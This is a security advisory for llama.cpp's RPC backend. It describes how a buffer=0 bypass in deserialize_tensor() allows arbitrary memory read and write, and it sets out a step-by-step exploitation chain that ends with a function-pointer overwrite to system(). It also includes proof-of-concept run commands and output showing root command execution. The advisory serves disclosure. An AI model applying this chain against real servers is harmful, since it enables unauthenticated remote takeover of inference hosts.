Skip to content

Unauthenticated RCE via GRAPH_COMPUTE buffer=0 bypass in llama.cpp RPC backend

Critical
ggerganov published GHSA-j8rj-fmpv-wcxw Mar 26, 2026

Software

llama.cpp

Affected versions

<= b7991

Patched versions

None

Description

Summary

The RPC backend's deserialize_tensor() skips all bounds validation when a tensor's buffer field is 0. An unauthenticated attacker can read and write arbitrary process memory via crafted GRAPH_COMPUTE messages. Combined with pointer leaks from ALLOC_BUFFER/BUFFER_GET_BASE, this gives full ASLR bypass and remote code execution. No authentication required, just TCP access to the RPC server port.

Details

In ggml/src/ggml-rpc/ggml-rpc.cpp, deserialize_tensor() (called during GRAPH_COMPUTE) only validates the data pointer when buffer != nullptr:

// Line 1177-1180: buffer=0 -> nullptr, validation skipped
result->buffer = reinterpret_cast<ggml_backend_buffer_t>(tensor->buffer);
if (result->buffer && buffers.find(result->buffer) == buffers.end()) {
    result->buffer = nullptr;
}

// Line 1182-1189: bounds check ONLY runs when buffer != nullptr
if (result->buffer) {
    // ... GGML_ASSERT checks on data pointer ...
}

// Line 1196: data pointer set unconditionally from attacker input
result->data = reinterpret_cast<void *>(tensor->data);

When buffer=0, the attacker-controlled data pointer goes straight to ggml compute kernels (e.g. ggml_compute_forward_dup does memcpy using tensor->data). This gives arbitrary read/write.

The SET_TENSOR bounds check (the RPC-04 fix) does not protect this path. GRAPH_COMPUTE uses graph_compute() -> create_node() -> deserialize_tensor(), a completely separate code path.

Exploitation chain:

  1. ASLR bypass: ALLOC_BUFFER returns raw heap pointer; BUFFER_GET_BASE returns data area pointer. Raw addresses are used as handles with no indirection table.
  2. Arbitrary read: GRAPH_COMPUTE with buffer=0 tensors + OP_CPY copies from any address into a readable buffer.
  3. Code pointer leak: Read the buffer struct's iface function pointers to get libggml-base.so base address.
  4. libc resolution: Read free@GOT.PLT from libggml-base.so, compute system() address via offset arithmetic.
  5. Function pointer overwrite: Overwrite a victim buffer struct's iface.clear with system(), place command string at offset 0 of the struct.
  6. Trigger: BUFFER_CLEAR calls buffer->iface.clear(buffer, 0) which becomes system("attacker_command").

PoC

Tested 2026-02-07 against rpc-server in Docker (Ubuntu 24.04, aarch64, commit e0c93af2a03f5c53d052dfaefd86c06ed3784646).

# Build (pinned commit for reproducible offsets)
cd exploits/
docker build -t rpc-debug -f Dockerfile.rpc-pinned .
docker run -d --name rpc-debug -p 50052:50052 rpc-debug

# Extract offsets (needed if rebuilding with different commit/distro)
docker exec rpc-debug /extract_offsets.sh

# Run full RCE chain
python3 rpc_graph_compute_poc.py 127.0.0.1 50052

# Verify
docker exec rpc-debug cat /tmp/pwned
# uid=0(root) gid=0(root) groups=0(root)

PoC output:

Phase 1 - Pointer Leak:
  Buffer A struct: 0x0000aaab1ddc4f70
  Buffer A data:   0x0000aaab1ddc7800

Phase 2 - Arbitrary Copy (buffer=0):
  Buffer B after: b'EXPLOITED_BY_BUFFER_ZERO_BYPASS!'
  [!!!] MATCH - buffer=0 arbitrary copy CONFIRMED

Phase 3 - Function Pointer Leak:
  clear = 0x0000ffffaac0ece4 (libggml-base.so)

Phase 4 - Resolve system():
  system() = 0x0000ffff9f4bcec4

Phase 5 - RCE:
  [!!!] Server responded - command executed successfully!

The server crashes (SIGBUS, exit 135) shortly after command execution during cleanup of the corrupted buffer struct. The command runs successfully and the BUFFER_CLEAR response is sent back before the crash. An attacker could avoid the crash by restoring the original iface struct via a second GRAPH_COMPUTE copy before triggering.

Impact

Remote code execution. Any unauthenticated TCP client that can reach the RPC server port (default 50052) gets arbitrary command execution as the server process user (often root in Docker).

  • Defeats ASLR via protocol-level pointer leaks
  • Defeats NX via function pointer hijacking (no shellcode needed)
  • Stack canaries and RELRO are irrelevant since this is a heap struct overwrite

Attack scenarios:

  • Lateral movement in corporate/cloud networks: scan for port 50052 on GPU servers
  • Internet exposure via Docker -p 50052:50052 or --host 0.0.0.0
  • Local privilege escalation from any process on the same host

The RPC backend must be explicitly enabled (-DGGML_RPC=ON) and defaults to localhost, but the intended use case is distributed inference across machines, so network exposure is expected.

Relation to prior CVEs

This vulnerability shares the same root cause as two previously patched CVEs:

  • CVE-2024-42478 (GHSA-xcr4-8r59-4fh2): OOB read via GET_TENSOR - patched by adding bounds validation in the GET_TENSOR handler.
  • CVE-2024-42479 (GHSA-g84r-q9f6-3frf): OOB read/write via SET_TENSOR - patched by adding a // sanitize tensor->data bounds check in set_tensor() (lines 1227-1237).

All three share the same underlying bug: deserialize_tensor() does not validate tensor->data when buffer=0. The 2024 patches added bounds checks in the GET_TENSOR and SET_TENSOR command handlers, but the GRAPH_COMPUTE command takes a separate code path (graph_compute() -> create_node() -> deserialize_tensor()) that was never patched. The buffer=0 bypass has been present since the initial RPC implementation (PR #6829, merged 2024-05-14).

This variant is more severe than the prior two because GRAPH_COMPUTE processes multiple tensors with arbitrary operations, giving the attacker both read and write primitives in a single request. The prior CVEs only gave read (GET_TENSOR) or write (SET_TENSOR) individually.

Disclosure context

This was reported to CERT/CC on 2026-02-08 as VU#748698. CERT/CC closed the case, so this report is being filed directly with the maintainers.

The project's SECURITY.md explicitly excludes RPC from vulnerability scope, stating: "Do not use the RPC backend" and "none of the topics under 'Using llama.cpp securely' are considered vulnerabilities." However, a full-chain unauthenticated RCE with a working exploit against a network service that ships in the official build system warrants maintainer awareness regardless of scope policy. The RPC backend is used in production for distributed inference across machines.

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID

CVE-2026-34159

Weaknesses

Improper Restriction of Operations within the Bounds of a Memory Buffer

The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. Learn more on MITRE.

Credits